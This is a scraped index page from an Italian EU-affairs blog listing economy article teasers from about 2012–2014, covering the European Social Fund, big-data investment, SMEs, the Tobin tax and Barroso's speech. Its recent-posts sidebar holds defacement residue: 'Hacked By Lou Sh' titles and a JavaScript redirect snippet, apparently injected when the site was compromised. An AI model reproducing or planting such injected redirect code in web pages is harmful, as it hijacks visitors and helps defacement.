EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Economia

Economia


Economia

it

A distanza di due mesi dall’accordo di partenariato tra la Commissione europea e la Francia per definire la migliore strategia per l’utilizzo dei fondi europei, lo scorso 10 ottobre la Commissione europea ha approvato il programma operativo francese per l’attuazione del Fondo sociale europeo (FSE) nella Francia continentale per il periodo 2014-2020.

Il fondo sociale europeo (FSE) ha un ruolo decisivo nel supportare gli investimenti degli Stati membri per ciò che riguarda il capitale umano e aiuta a sostenere la competizione economica europea. Assiste ogni anno 15 milioni di persone per sostenerle nelle loro competenze, per aiutarle ad (...)

it

L’accordo stretto lo scorso 13 ottobre tra la Commissione e l’industria europea dei dati prevede un investimento di 2,5 miliardi di euro destinati alla gestione dei big data. In questo modo l’Europa potrà portarsi al pari degli altri Stati a livello mondiale. L’intesa sarà attiva a partire dal 1° gennaio 2015.

Investire nei megadati porterebbe alla creazione di circa 100.000 nuovi posti di lavoro entro il 2020 e potrebbe ridurre del 10% i consumi energetici in Europa, sviluppare l’assistenza sanitaria e avere a disposizione macchinari industriali più efficienti.

L’intesa in materia di megadati è (...)

it

Il 2013 è stato un anno difficile per la ripresa economica delle PMI europee: nonostante alcuni segnali di una lenta risalita finanziaria, la ripresa appare assai instabile e non si è ancora assestata del tutto. La Commissione europea lo ha annunciato il 3 ottobre attraverso le schede informative relative allo Small Business Act for Europe (SBA), il programma europeo a sostegno delle piccole e medie imprese.

Per ciò che riguarda l’ambito occupazionale, rispetto al 2008 la percentuale di occupazione si è assestata sul 2,16% in meno e questo ha portato ad una disoccupazione pari a 1,9 milioni di lavoratori. Inoltre va sottolineato come a causa della crisi economica mondiale e del calo dell’inflazione (...)

it

Pubblicata dalla Commissione europea la relazione annuale relativa alle frodi al bilancio UE: necessario da parte degli Stati membri un impegno maggiore per ciò che riguarda la lotta alle frodi. All’interno della relazione sono contenuti alcuni elementi importanti sui quali gli Stati membri dovrebbero porre maggiore attenzione. Secondo la Commissione, occorre un maggiore impegno a livello nazionale per mettere in rilievo e combattere le frodi al bilancio dell'UE.

Il primo passo è sicuramente quello di analizzare i dati risultanti dai controlli effettuati: un atteggiamento che già molti paesi hanno preso in considerazione e che porteranno avanti negli anni a venire. Attraverso i dati è possibile capire l’impatto che le frodi hanno sui fondi e i bilanci (...)

it

Il 6 e 7 novembre il Vicepresidente e Commissario europeo per l’industria e l’imprenditoria, Antonio Tajani, si è riunito a Parigi con gli esponenti più influenti del settore moda e dei prodotti d’alta gamma, per favorire lo sviluppo di un piano d’azione. Tra le associazioni partecipanti l'Union Française des Industries de l'Habillement, l'Union des Industries Textiles, la Fédération Française de la Chaussure, l'Union des Fabricants e l'Institut Français de la Mode.

L’incontro di Parigi è stata l’occasione per costruire un fronte comune alla sfida che la moda si trova a dover prendere in esame e per pronosticare delle soluzioni concrete. Ma su cosa verte la sfida? Nel dibattito i temi sono molteplici: innanzitutto un miglioramento della politica industriale (...)

it

La rete centrale di trasporto sarà realizzata entro il 2030 e servirà da struttura portante dei trasporti nel mercato unico. Il prossimo passo per concretizzare la fitta rete di connessione prevede di aggiungere i collegamenti transfrontalieri mancanti, eliminare le strozzature e rendere la rete più intelligente.

Il commissario europeo responsabile per i trasporti, Siim Kallas, oggi ha dato il benvenuto all’accordo tra la Commissione, il Consiglio e il Parlamento, che prevede la trasformazione di strade, autostrade, aeroporti e canali europei, in un’unica rete di trasporti (TEN-T). Kallas ha affermato che (...)

it

In questa settimana avranno luogo incontri ed iniziative per celebrare i numerosi traguardi del mercato unico e per discuterne il futuro sviluppo, la crescita e le opportunità che il Mercato Unico può dare ai cittadini europei. Per festeggiare questi 20 anni si è parlato anche di crescita economica e delle opportunità, impensabili per le generazioni precedenti.

Il mercato Unico Europeo è diventato attivo dal 1° Gennaio 1993 e comporta quattro libertà fondamentali: libera circolazione delle merci, dei servizi, delle persone e dei capitali; coesione economica; attuazione di politiche comuni volte all’armonizzazione delle normative nazionali. Il Mercato (...)

it

Nata a seguito dello scandalo Watergate e fondata dall’economista James Tobin, dal quale prende il nome, la tassa attacca le transizioni finanziare e si pone come obiettivo quello di garantire la stabilità valutaria internazionale. La Tobin Tax potrebbe presto diventare realtà. Si attende la decisione definitiva di alcuni dei Paesi membri. In modo particolare Italia e Spagna sembrano rappresentare l’ago della bilancia: la svolta è nelle loro mani.

La richiesta di Francia e Germania

Germania e Francia, attraverso i loro portavoce, i ministri delle Finanze Wolfgang Schaeuble e Pierre Moscovici, hanno inviato un comunicato alla Commissione europea chiedendo di permettere a 9 Stati membri di introdurre una tassa sulle transazioni (...)

it

Durante il discorso Barroso ha voluto concentrarsi principalmente sugli effetti della crisi economica e sulla democrazia. Ha voluto esprimere la necessità di “un’Europa più unita” per superare la crisi e conservare la sovranità in un mondo sempre più globalizzato. “Globalizzazione vuol dire più integrazione, e più integrazione vuol dire più democrazia” ha dichiarato. Ha quindi sottolineato l’irreversibilità della moneta unica, ammonendo gli Stati più vulnerabili all’assunzione delle proprie responsabilità, invitandoli a mantenere gli impegni di risanamento ed esortando gli Stati più forti a seguire la strada della solidarietà e della coesione.

Barroso ha ribadito che l’attuale crisi non è solo di natura economica e finanziaria ma anche sociale. Ad essere in crisi è la politica stessa a causa di una mancanza di fiducia da parte dei cittadini per le istituzioni. I cittadini ormai si sentono abbandonati, minacciati, costretti a cambiare (...)

it

Non è un caso che il meeting sia avvenuto pochi giorni dopo l'approvazione da parte della Corte Costituzionale tedesca dell'Esm, il Meccanismo europeo di stabilità, giornalisticamente noto come "fondo salva-stati". La situazione europea sembra sempre più incerta, nonostante le rassicurazioni che arrivano sporadicamente da rappresentanti continentali. In particolare è stata analizzata la situazione della Grecia, il Paese che forse più di tutti ha risentito della crisi.

Con l’espressione Ecofin si indica il Consiglio economia e finanza dell’UE, formato dai ministri delle finanza e dell’economia dei diversi Stati membri. Quello che traspare dall’incontro è un cauto ottimismo, che francamente stona con la percezione che i cittadini hanno di questa infinita crisi. (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France